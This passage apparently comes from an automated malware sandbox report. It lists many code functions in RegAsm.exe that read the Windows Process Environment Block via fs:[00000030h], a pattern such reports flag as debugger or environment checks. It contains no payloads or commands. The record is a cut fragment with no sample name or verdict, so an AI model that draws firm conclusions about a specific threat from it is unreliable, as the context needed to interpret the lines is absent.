                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h]4_2_02C451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h]4_2_02C451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C251ED mov eax, dword ptr fs:[00000030h]4_2_02C251ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C501F8 mov eax, dword ptr fs:[00000030h]4_2_02C501F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C60185 mov eax, dword ptr fs:[00000030h]4_2_02C60185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDC188 mov eax, dword ptr fs:[00000030h]4_2_02CDC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDC188 mov eax, dword ptr fs:[00000030h]4_2_02CDC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA019F mov eax, dword ptr fs:[00000030h]4_2_02CA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA019F mov eax, dword ptr fs:[00000030h]4_2_02CA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA019F mov eax, dword ptr fs:[00000030h]4_2_02CA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA019F mov eax, dword ptr fs:[00000030h]4_2_02CA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1A197 mov eax, dword ptr fs:[00000030h]4_2_02C1A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1A197 mov eax, dword ptr fs:[00000030h]4_2_02C1A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1A197 mov eax, dword ptr fs:[00000030h]4_2_02C1A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD11A4 mov eax, dword ptr fs:[00000030h]4_2_02CD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD11A4 mov eax, dword ptr fs:[00000030h]4_2_02CD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD11A4 mov eax, dword ptr fs:[00000030h]4_2_02CD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD11A4 mov eax, dword ptr fs:[00000030h]4_2_02CD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3B1B0 mov eax, dword ptr fs:[00000030h]4_2_02C3B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C19148 mov eax, dword ptr fs:[00000030h]4_2_02C19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C19148 mov eax, dword ptr fs:[00000030h]4_2_02C19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C19148 mov eax, dword ptr fs:[00000030h]4_2_02C19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C19148 mov eax, dword ptr fs:[00000030h]4_2_02C19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB4144 mov eax, dword ptr fs:[00000030h]4_2_02CB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB4144 mov eax, dword ptr fs:[00000030h]4_2_02CB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB4144 mov ecx, dword ptr fs:[00000030h]4_2_02CB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB4144 mov eax, dword ptr fs:[00000030h]4_2_02CB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB4144 mov eax, dword ptr fs:[00000030h]4_2_02CB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C27152 mov eax, dword ptr fs:[00000030h]4_2_02C27152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C26154 mov eax, dword ptr fs:[00000030h]4_2_02C26154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C26154 mov eax, dword ptr fs:[00000030h]4_2_02C26154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1C156 mov eax, dword ptr fs:[00000030h]4_2_02C1C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF5152 mov eax, dword ptr fs:[00000030h]4_2_02CF5152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB9179 mov eax, dword ptr fs:[00000030h]4_2_02CB9179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h]4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CCA118 mov ecx, dword ptr fs:[00000030h]4_2_02CCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CCA118 mov eax, dword ptr fs:[00000030h]4_2_02CCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CCA118 mov eax, dword ptr fs:[00000030h]4_2_02CCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CCA118 mov eax, dword ptr fs:[00000030h]4_2_02CCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE0115 mov eax, dword ptr fs:[00000030h]4_2_02CE0115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C50124 mov eax, dword ptr fs:[00000030h]4_2_02C50124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C21131 mov eax, dword ptr fs:[00000030h]4_2_02C21131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C21131 mov eax, dword ptr fs:[00000030h]4_2_02C21131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1B136 mov eax, dword ptr fs:[00000030h]4_2_02C1B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1B136 mov eax, dword ptr fs:[00000030h]4_2_02C1B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1B136 mov eax, dword ptr fs:[00000030h]4_2_02C1B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1B136 mov eax, dword ptr fs:[00000030h]4_2_02C1B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2B6C0 mov eax, dword ptr fs:[00000030h]4_2_02C2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2B6C0 mov eax, dword ptr fs:[00000030h]4_2_02C2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2B6C0 mov eax, dword ptr fs:[00000030h]4_2_02C2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2B6C0 mov eax, dword ptr fs:[00000030h]4_2_02C2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2B6C0 mov eax, dword ptr fs:[00000030h]4_2_02C2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2B6C0 mov eax, dword ptr fs:[00000030h]4_2_02C2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5A6C7 mov ebx, dword ptr fs:[00000030h]4_2_02C5A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5A6C7 mov eax, dword ptr fs:[00000030h]4_2_02C5A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE16CC mov eax, dword ptr fs:[00000030h]4_2_02CE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE16CC mov eax, dword ptr fs:[00000030h]4_2_02CE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE16CC mov eax, dword ptr fs:[00000030h]4_2_02CE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE16CC mov eax, dword ptr fs:[00000030h]4_2_02CE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDF6C7 mov eax, dword ptr fs:[00000030h]4_2_02CDF6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C516CF mov eax, dword ptr fs:[00000030h]4_2_02C516CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4D6E0 mov eax, dword ptr fs:[00000030h]4_2_02C4D6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4D6E0 mov eax, dword ptr fs:[00000030h]4_2_02C4D6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB36EE mov eax, dword ptr fs:[00000030h]4_2_02CB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB36EE mov eax, dword ptr fs:[00000030h]4_2_02CB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB36EE mov eax, dword ptr fs:[00000030h]4_2_02CB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB36EE mov eax, dword ptr fs:[00000030h]4_2_02CB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB36EE mov eax, dword ptr fs:[00000030h]4_2_02CB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB36EE mov eax, dword ptr fs:[00000030h]4_2_02CB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C536EF mov eax, dword ptr fs:[00000030h]4_2_02C536EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C9E6F2 mov eax, dword ptr fs:[00000030h]4_2_02C9E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C9E6F2 mov eax, dword ptr fs:[00000030h]4_2_02C9E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C9E6F2 mov eax, dword ptr fs:[00000030h]4_2_02C9E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C9E6F2 mov eax, dword ptr fs:[00000030h]4_2_02C9E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA06F1 mov eax, dword ptr fs:[00000030h]4_2_02CA06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA06F1 mov eax, dword ptr fs:[00000030h]4_2_02CA06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDD6F0 mov eax, dword ptr fs:[00000030h]4_2_02CDD6F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA368C mov eax, dword ptr fs:[00000030h]4_2_02CA368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA368C mov eax, dword ptr fs:[00000030h]4_2_02CA368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA368C mov eax, dword ptr fs:[00000030h]4_2_02CA368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA368C mov eax, dword ptr fs:[00000030h]4_2_02CA368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C24690 mov eax, dword ptr fs:[00000030h]4_2_02C24690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C24690 mov eax, dword ptr fs:[00000030h]4_2_02C24690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5C6A6 mov eax, dword ptr fs:[00000030h]4_2_02C5C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1D6AA mov eax, dword ptr fs:[00000030h]4_2_02C1D6AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1D6AA mov eax, dword ptr fs:[00000030h]4_2_02C1D6AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C176B2 mov eax, dword ptr fs:[00000030h]4_2_02C176B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C176B2 mov eax, dword ptr fs:[00000030h]4_2_02C176B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C176B2 mov eax, dword ptr fs:[00000030h]4_2_02C176B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C566B0 mov eax, dword ptr fs:[00000030h]4_2_02C566B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3C640 mov eax, dword ptr fs:[00000030h]4_2_02C3C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE866E mov eax, dword ptr fs:[00000030h]4_2_02CE866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE866E mov eax, dword ptr fs:[00000030h]4_2_02CE866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5A660 mov eax, dword ptr fs:[00000030h]4_2_02C5A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5A660 mov eax, dword ptr fs:[00000030h]4_2_02C5A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C59660 mov eax, dword ptr fs:[00000030h]4_2_02C59660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C59660 mov eax, dword ptr fs:[00000030h]4_2_02C59660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C52674 mov eax, dword ptr fs:[00000030h]4_2_02C52674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C9E609 mov eax, dword ptr fs:[00000030h]4_2_02C9E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C51607 mov eax, dword ptr fs:[00000030h]4_2_02C51607
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5F603 mov eax, dword ptr fs:[00000030h]4_2_02C5F603
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3260B mov eax, dword ptr fs:[00000030h]4_2_02C3260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3260B mov eax, dword ptr fs:[00000030h]4_2_02C3260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3260B mov eax, dword ptr fs:[00000030h]4_2_02C3260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3260B mov eax, dword ptr fs:[00000030h]4_2_02C3260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3260B mov eax, dword ptr fs:[00000030h]4_2_02C3260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3260B mov eax, dword ptr fs:[00000030h]4_2_02C3260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3260B mov eax, dword ptr fs:[00000030h]4_2_02C3260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C23616 mov eax, dword ptr fs:[00000030h]4_2_02C23616
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C23616 mov eax, dword ptr fs:[00000030h]4_2_02C23616
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62619 mov eax, dword ptr fs:[00000030h]4_2_02C62619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E627 mov eax, dword ptr fs:[00000030h]4_2_02C3E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C56620 mov eax, dword ptr fs:[00000030h]4_2_02C56620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C58620 mov eax, dword ptr fs:[00000030h]4_2_02C58620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h]4_2_02C1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h]4_2_02C1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h]4_2_02C1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h]4_2_02C1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h]4_2_02C1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h]4_2_02C1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h]4_2_02C1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h]4_2_02C1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h]4_2_02C1F626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2262C mov eax, dword ptr fs:[00000030h]4_2_02C2262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF5636 mov eax, dword ptr fs:[00000030h]4_2_02CF5636
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2C7C0 mov eax, dword ptr fs:[00000030h]4_2_02C2C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C257C0 mov eax, dword ptr fs:[00000030h]4_2_02C257C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C257C0 mov eax, dword ptr fs:[00000030h]4_2_02C257C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C257C0 mov eax, dword ptr fs:[00000030h]4_2_02C257C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2D7E0 mov ecx, dword ptr fs:[00000030h]4_2_02C2D7E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C427ED mov eax, dword ptr fs:[00000030h]4_2_02C427ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C427ED mov eax, dword ptr fs:[00000030h]4_2_02C427ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C427ED mov eax, dword ptr fs:[00000030h]4_2_02C427ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C247FB mov eax, dword ptr fs:[00000030h]4_2_02C247FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C247FB mov eax, dword ptr fs:[00000030h]4_2_02C247FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDF78A mov eax, dword ptr fs:[00000030h]4_2_02CDF78A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA97A9 mov eax, dword ptr fs:[00000030h]4_2_02CA97A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CAF7AF mov eax, dword ptr fs:[00000030h]4_2_02CAF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CAF7AF mov eax, dword ptr fs:[00000030h]4_2_02CAF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CAF7AF mov eax, dword ptr fs:[00000030h]4_2_02CAF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CAF7AF mov eax, dword ptr fs:[00000030h]4_2_02CAF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CAF7AF mov eax, dword ptr fs:[00000030h]4_2_02CAF7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C207AF mov eax, dword ptr fs:[00000030h]4_2_02C207AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4D7B0 mov eax, dword ptr fs:[00000030h]4_2_02C4D7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF37B6 mov eax, dword ptr fs:[00000030h]4_2_02CF37B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h]4_2_02C1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h]4_2_02C1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h]4_2_02C1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h]4_2_02C1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h]4_2_02C1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h]4_2_02C1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h]4_2_02C1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h]4_2_02C1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h]4_2_02C1F7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C33740 mov eax, dword ptr fs:[00000030h]4_2_02C33740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C33740 mov eax, dword ptr fs:[00000030h]4_2_02C33740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C33740 mov eax, dword ptr fs:[00000030h]4_2_02C33740
